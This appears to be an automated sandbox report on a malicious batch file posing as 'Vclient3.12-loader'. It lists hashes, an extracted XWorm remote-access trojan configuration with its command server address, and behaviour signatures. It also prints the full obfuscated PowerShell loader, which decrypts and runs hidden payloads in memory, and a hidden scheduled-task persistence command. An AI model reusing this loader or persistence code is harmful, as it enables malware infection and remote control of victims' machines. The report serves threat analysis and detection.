Analysis
-
max time kernel
95s -
max time network
139s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
04/03/2025, 03:26
Static task
static1
Behavioral task
behavioral1
Sample
Vclient3.12-loader.bat
Resource
win10ltsc2021-20250217-en
General
-
Target
Vclient3.12-loader.bat
-
Size
337KB
-
MD5
b0b26501fa33bc553f9a54ca28a89a85
-
SHA1
9f868d7d464375d1ea60c5234f4dd057ea85fce1
-
SHA256
f60cc29ba04d75d31227e8f0417640ed962d2cbfb537072b1b00aa89df9be473
-
SHA512
fcd9680de0ce271730f9cc5968d3172ed03e2463e53af66b19c898e7ac0e6c97717f8948d27e329f30f78ba051bb4a81acb4dc837ce602964e64470a6a0f3069
-
SSDEEP
6144:7rVhpfca9iHDDTI3nozeFFDNwPlxR+RG7PrwzZ0qw/FU1qBIEhY:dbaHDunIxoRWrOZ05U11EhY
Malware Config
Extracted
xworm
45.88.91.55:8893
-
Install_directory
%ProgramData%
-
install_file
sys-32.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2536-51-0x000001A823A40000-0x000001A823A72000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 15 2536 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3256 powershell.exe 4860 powershell.exe 2536 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-983685854-559653692-675906587-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3256 powershell.exe 3256 powershell.exe 4860 powershell.exe 4860 powershell.exe 2536 powershell.exe 2536 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe Token: SeRestorePrivilege 4860 powershell.exe Token: SeShutdownPrivilege 4860 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeSystemEnvironmentPrivilege 4860 powershell.exe Token: SeRemoteShutdownPrivilege 4860 powershell.exe Token: SeUndockPrivilege 4860 powershell.exe Token: SeManageVolumePrivilege 4860 powershell.exe Token: 33 4860 powershell.exe Token: 34 4860 powershell.exe Token: 35 4860 powershell.exe Token: 36 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe Token: SeRestorePrivilege 4860 powershell.exe Token: SeShutdownPrivilege 4860 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeSystemEnvironmentPrivilege 4860 powershell.exe Token: SeRemoteShutdownPrivilege 4860 powershell.exe Token: SeUndockPrivilege 4860 powershell.exe Token: SeManageVolumePrivilege 4860 powershell.exe Token: 33 4860 powershell.exe Token: 34 4860 powershell.exe Token: 35 4860 powershell.exe Token: 36 4860 powershell.exe Token: SeIncreaseQuotaPrivilege 4860 powershell.exe Token: SeSecurityPrivilege 4860 powershell.exe Token: SeTakeOwnershipPrivilege 4860 powershell.exe Token: SeLoadDriverPrivilege 4860 powershell.exe Token: SeSystemProfilePrivilege 4860 powershell.exe Token: SeSystemtimePrivilege 4860 powershell.exe Token: SeProfSingleProcessPrivilege 4860 powershell.exe Token: SeIncBasePriorityPrivilege 4860 powershell.exe Token: SeCreatePagefilePrivilege 4860 powershell.exe Token: SeBackupPrivilege 4860 powershell.exe Token: SeRestorePrivilege 4860 powershell.exe Token: SeShutdownPrivilege 4860 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeSystemEnvironmentPrivilege 4860 powershell.exe Token: SeRemoteShutdownPrivilege 4860 powershell.exe Token: SeUndockPrivilege 4860 powershell.exe Token: SeManageVolumePrivilege 4860 powershell.exe Token: 33 4860 powershell.exe Token: 34 4860 powershell.exe Token: 35 4860 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4388 wrote to memory of 2944 4388 cmd.exe 82 PID 4388 wrote to memory of 2944 4388 cmd.exe 82 PID 2944 wrote to memory of 4804 2944 net.exe 83 PID 2944 wrote to memory of 4804 2944 net.exe 83 PID 4388 wrote to memory of 3256 4388 cmd.exe 84 PID 4388 wrote to memory of 3256 4388 cmd.exe 84 PID 3256 wrote to memory of 4860 3256 powershell.exe 85 PID 3256 wrote to memory of 4860 3256 powershell.exe 85 PID 3256 wrote to memory of 1412 3256 powershell.exe 90 PID 3256 wrote to memory of 1412 3256 powershell.exe 90 PID 1412 wrote to memory of 2820 1412 WScript.exe 91 PID 1412 wrote to memory of 2820 1412 WScript.exe 91 PID 2820 wrote to memory of 4900 2820 cmd.exe 93 PID 2820 wrote to memory of 4900 2820 cmd.exe 93 PID 4900 wrote to memory of 4788 4900 net.exe 94 PID 4900 wrote to memory of 4788 4900 net.exe 94 PID 2820 wrote to memory of 2536 2820 cmd.exe 95 PID 2820 wrote to memory of 2536 2820 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Vclient3.12-loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:4804
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Vclient3.12-loader.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Vclient3.12-loader.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_39_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_39.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_39.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_39.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:4788
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IvmgzXjQuMVka6TfIyG1HvCr7DfXZYnR3O8Q3T8SJgE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbClhals/5qz6aDu+zXVpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aNToN=New-Object System.IO.MemoryStream(,$param_var); $rAzqO=New-Object System.IO.MemoryStream; $bDCjb=New-Object System.IO.Compression.GZipStream($aNToN, [IO.Compression.CompressionMode]::Decompress); $bDCjb.CopyTo($rAzqO); $bDCjb.Dispose(); $aNToN.Dispose(); $rAzqO.Dispose(); $rAzqO.ToArray();}function execute_function($param_var,$param2_var){ $Wdwoi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fjmwH=$Wdwoi.EntryPoint; $fjmwH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_39.bat';$vmyBp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_39.bat').Split([Environment]::NewLine);foreach ($lpWSJ in $vmyBp) { if ($lpWSJ.StartsWith(':: ')) { $jqVvs=$lpWSJ.Substring(3); break; }}$payloads_var=[string[]]$jqVvs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2536
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2684
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5b9cd68b5f314b5190f27a211d3506df0
SHA160c891d9a3c857fda4b75576420a54d38054c544
SHA2568908f5cb47ad8627c2af37f08e4f42734cb8dd761734d27fb7745ca522e0018e
SHA5121565a76680cf17ec9426dacab318124ff6374243e19550616069cd1a6149f356bb6f90ea524fbddce2082631be85831d5cb3a118d53c2c15c82096100b5b6182
-
Filesize
1KB
MD59820605376b39dbdd48c6e3de2d2d0c3
SHA1b717f9e8624e2b080cf6eab8c03ca7a215bee710
SHA256f772222c53f64be53c292173d1a5df59291c0eec56081d9b3407a3779d2f45ef
SHA5129d07cfe8b10b0afc9948e731ea3218924bc5276f32af668d317654a0d829435d377ca125a0d4d46004abe91c3b65c49d0b3ba2bd24d09c08fba5b92bfb0a45ca
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
114B
MD59409aca889b2312620ae9381eb8e4b4c
SHA1617f48ba66a22b56adce636af88c955d6ece9403
SHA256c1f8521fcd84e6ebb4a414d44b06673249e01fc77475aeb1be70ce987280170b
SHA512d4fa1ea435730b1c01c153600ed362c09c860b4de5af541d7e308c7e999704d8150dd65e7f032f76d6c50dc88c627742110bee3ddad07f69b66e48dbd6c10c33